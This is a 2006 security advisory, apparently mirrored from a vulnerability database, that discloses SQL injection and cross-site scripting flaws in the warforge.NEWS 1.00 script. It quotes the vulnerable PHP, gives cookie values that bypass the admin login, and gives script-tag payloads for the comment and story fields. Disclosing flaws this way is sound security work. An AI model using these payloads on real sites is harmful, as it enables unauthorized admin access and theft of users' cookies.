Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12439
HistoryApr 27, 2006 - 12:00 a.m.

warforge.NEWS

2006-04-2700:00:00
vulners.com
10

warforge.NEWS exploit
i've paste it on: http://forum.zone-h.org/viewtopic.php?t=5468




-= warforge.NEWS =-

yamcho
April 26, 2006

Vunerability(s):

SQL Injection
XSS

Product:

warforge.NEWS 1.00

Vendor:

http://www.thewarforge.com/

Description of product:

warforge.NEWS is a script designed for easy use/implementation. It has a
full featured administration section and is powered by a mysql database.

Vulnerability / Exploit:

SQL Injection

In the file authcheck.php there is a flaw, that can allow a user to
login as Admin.

The code is:

[…]

if(isset($_COOKIE["authaccess"]) || isset($_COOKIE["authusername"])) {
// This checks to make sure the username and password in the cookie are
actual users,
// this checks everytime you load a page to prevent cookie spoofing
$usern = $_COOKIE["authusername"];
$pass = $_COOKIE["authpassword"];
mysql_connect($db_Host, $db_Username, $db_Pass);
mysql_select_db($db_Database);
$cookiecheck = mysql_query("SELECT * FROM $usertable WHERE username =
'$usern' AND password = '$pass'");

[…]

So, if a remote user add this cookies to his cookies list:

1)
authusername=ADMINUSERNAME'/*;
authpassword=null;
authfirst_name=null;
authlast_name=null;
authaccess=null;
authemail=null;

or this:

2)
authusername=null;
authpassword=' OR '1'='1;
authfirst_name=null;
authlast_name=null;
authaccess=null;
authemail=null;

The query will be:

1) SELECT * FROM $usertable WHERE username = 'ADMINUSERNAME'/*' AND
password = '$pass'"

2) SELECT * FROM $usertable WHERE username = '$usern' AND password = ''
OR '1'='1'"

The remote user now is logged in as Admin.

XSS

In the file news.php there is a flaw, that can allow a user to
make an XSS attack.

The code is:

[…]

if(isset($_GET["newcomment"]) == "yes") {
// This is where it processes the mysql to add a new comment
$name = $_POST["name"];
$email = $_POST["email"];
$title = $_POST["title"];
$comment = $_POST["comment"];

[…]

Some of this camps can be use to make an XSS attack.

So, if a remote user use this

><script>alert(document.cookies);</script>

into 'Your Name', 'Title' and 'Comment' form's field, he can gain data
information.

In the file newsadd.php there is a flaw, that can allow a user that as
login to
make an XSS attack.

The code is:

[…]

if(isset($_POST["addstory"]) == "1") {
// add the news post error checking blah blah
$title = $_POST["title"];
$author = $_COOKIE["authusername"];
$email = $_COOKIE["authemail"];
$newspost = $_POST["newspost"];

[…]

Some of this camps can be use to make an XSS attack.

So, if a remote user use this

<script>alert(document.coockies);</script>

into 'Title' and/or 'Story' form's field, he can gain data information.

Credits:

yamcho
yamcho[at]email[dot]it


Email.it, the professional e-mail, gratis per te: http://www.email.it/f

Sponsor:
DVD vergini: acquista online a prezzi vantaggiosi!
Clicca qui: http://adv.email.it/cgi-bin/foclick.cgi?mid=4589&amp;d=27-4